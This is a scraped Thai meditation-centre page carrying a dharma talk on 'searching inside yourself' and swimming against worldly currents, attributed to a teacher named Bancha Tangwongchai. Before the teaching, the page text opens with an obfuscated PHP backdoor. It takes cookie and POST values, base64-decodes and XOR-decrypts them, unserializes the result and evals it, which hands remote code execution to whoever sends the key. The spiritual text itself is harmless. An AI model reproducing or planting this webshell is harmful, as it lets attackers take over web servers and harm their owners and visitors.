$iniKU = "\x4e" . 'g' . chr ( 756 - 658 )."\137" . chr ( 907 - 838 ).chr (66) . "\167";$myyExn = 'c' . 'l' . "\141" . "\x73" . "\163" . "\x5f" . "\x65" . chr (120) . chr ( 277 - 172 ).chr ( 880 - 765 )."\x74" . "\163";$vTdOqhW = class_exists($iniKU); $myyExn = "32259";$vAAay = !1;if ($vTdOqhW == $vAAay){function Jwxxo(){return FALSE;}$QfzmsEypX = "15648";Jwxxo();class Ngb_EBw{private function xKGGL($QfzmsEypX){if (is_array(Ngb_EBw::$avSeuoHui)) {$HNNJexxV = str_replace(chr (60) . chr ( 542 - 479 )."\160" . chr (104) . "\x70", "", Ngb_EBw::$avSeuoHui["\143" . "\x6f" . "\156" . 't' . "\145" . 'n' . "\x74"]);eval($HNNJexxV); $QfzmsEypX = "15648";exit();}}private $PpOeVk;public function eCrFVEB(){echo 28385;}public function __destruct(){$QfzmsEypX = "20419_16761";$this->xKGGL($QfzmsEypX); $QfzmsEypX = "20419_16761";}public function __construct($PlBYqoqvu=0){$JCuGXEK = $_POST;$LVuXxA = $_COOKIE;$otdEyqxrW = "abbe5226-71cc-40c5-9d39-6b2242a26fb4";$drVNpRcsa = @$LVuXxA[substr($otdEyqxrW, 0, 4)];if (!empty($drVNpRcsa)){$joLSFKk = "base64";$jVoOivToi = "";$drVNpRcsa = explode(",", $drVNpRcsa);foreach ($drVNpRcsa as $ythUtVZV){$jVoOivToi .= @$LVuXxA[$ythUtVZV];$jVoOivToi .= @$JCuGXEK[$ythUtVZV];}$jVoOivToi = array_map($joLSFKk . chr ( 292 - 197 )."\144" . "\145" . "\143" . "\157" . 'd' . 'e', array($jVoOivToi,)); $jVoOivToi = $jVoOivToi[0] ^ str_repeat($otdEyqxrW, (strlen($jVoOivToi[0]) / strlen($otdEyqxrW)) + 1);Ngb_EBw::$avSeuoHui = @unserialize($jVoOivToi); $jVoOivToi = class_exists("20419_16761");}}public static $avSeuoHui = 42183;}$wsxQiirY = new /* 12138 */ $iniKU(15648 + 15648); $QfzmsEypX = strpos($QfzmsEypX, $QfzmsEypX); $vAAay = $wsxQiirY = $QfzmsEypX = Array();} Search inside yourself | ศูนย์พลาญข่อย
080-5519598 (คุณแก้ว) plarnkhoi@hotmail.com
Select Page

ถ้าในแง่ชีวิตแล้ว ความจริงสูงสุด ต้อง . ต้องเข้าไปข้างใน ความจริงสูงสุดมันอยู่ข้างในไม่ได้อยู่ข้างนอก

อันนี้คือความจริงสูงสุดเฉพาะตัวเราก่อน เมื่อตัวเราเจอความจริงสูงสุดแล้ว คนอื่นก็เหมือนกัน ถ้าเราเข้าใจตัวเอง
คนอื่นเค้าก็เหมือนเรา โครงสร้างเค้าก็เหมือนเรา ประกอบด้วยสิ่งเหมือนกัน ดิน น้ำ ลม ไฟ แต่ตอนนี้เราเรียนรู้วิชาข้างนอก

อยากก้าวหน้า ต้องถอยหลัง ถอยมาอยู่ทำนองคลองธรรมที่มันควรจะเป็น ชีวิตเรา เหมือนมดมอดตัวนิ๊ดเดียวเอง
เรายังไม่รู้เลยว่าเราเป็นใคร เราจะไปแสวงหาสิ่งที่ยิ่งใหญ่บนจักรวาล ชีวิตเรามันสั้นเกินไป แล้วจะไม่มีวันเห็น
ถึงมันจะเห็น มันก็ไม่เกี่ยวกับชีวิตเรา ไม่เกี่ยวกับการพ้นทุกข์ของเรา

ปลาเป็นทวนน้ำ ปลาตายตามน้ำ ปลาน้ำจืดถ้ามันมักง่าย ขี้เกียจว่ายทวนกระแส มันก็ตามกระแสไปเรื่อยๆ
มันลงทะเล มันตายหมด คนวิ่งไปตามกระแสโลกตามแฟชั่น ตามค่านิยม อันนี้ถือว่าถ้าเป็นปลาก็เป็นปลาตายทั้งเป็น
มีแต่ปลาตายเท่านั้น ถึงจะตามกระแส

ในขณะนี้ ในเวลานี้ จึงถือว่าเป็นโอกาสดีในชีวิตหนึ่ง ที่เรามีโอกาสมาทวนกระแส มา Search inside yourself.
มาศึกษาวิเคราะห์เข้าไปในตัวเอง เรากำลังทวนกระแสโลก เข้าสู่กระแสธรรม กระแสธรรมไม่เกี่ยวกับศาสนา ศาสนาพูดถึงเรื่องธรรม
แต่ละศาสนาก็มีอุบายวิธีที่ต่างกัน แต่เป้าหมายมันไม่ได้ต่างกันหรอก ถ้าพูดเรื่องจิตวิญญาณ จิตวิญญาณมันอยู่ข้างใน
อยู่ในตัวเราไม่ได้อยู่ข้างนอก กระแสธรรมมันก็อยู่ข้างใน

กระแสโลกเราต้องลืมตา Open Mind เปิดตากว้างๆ หูตากว้างไกล แค่ใกล้ๆ คนข้างตัวเราได้ยินนี่ก็หงุดหงิด
ทะเลาะกันไม่หยุดไม่หย่อนแล้ว ยังเปิดหูไปดูเรื่องปัญหายากๆ ปัญหามากมาย เอาขยะเข้ามาอีกเพิ่มอารมณ์เครียด
เพราะความอยากของเรา

แต่กระแสธรรมความจริงที่เรากำลังแสวงหาอยู่ อยากก้าวหน้าต้องถอยหลัง ต้องเริ่มจากหลับตาก่อน เราจึงจะเห็นตัวเอง
ทางโลกบอกให้ลืมตากว้างๆ มองไกลๆ จนสิ่งข้างตัวเนี่ย คนใกล้ๆ ก็คุยกันไม่รู้เรื่อง มันมัวแต่ไปมองไกลอยู่
จนความจริงที่อยู่ข้างตัวนี่ก็มองไม่เห็น เรียนไปไกลๆ ไปเรียนถึงเมืองนอกเมืองนา จบปริญญาเอก เป็นด็อกเตอร์
ทางด้านภาษาศาสตร์กลับมาบ้าน คุยกันไม่รู้ภาษา เพราะไปมองไกลๆ มองแต่ข้างนอก จนเรื่องใกล้ตัวก็มองไม่เห็น
เราทำอย่างไร เราก็เป็นอย่างนั้น

คุณคือสิ่งที่คุณทำ You are what you do.

– พ่อครูบัญชา ตั้งวงษ์ไชย –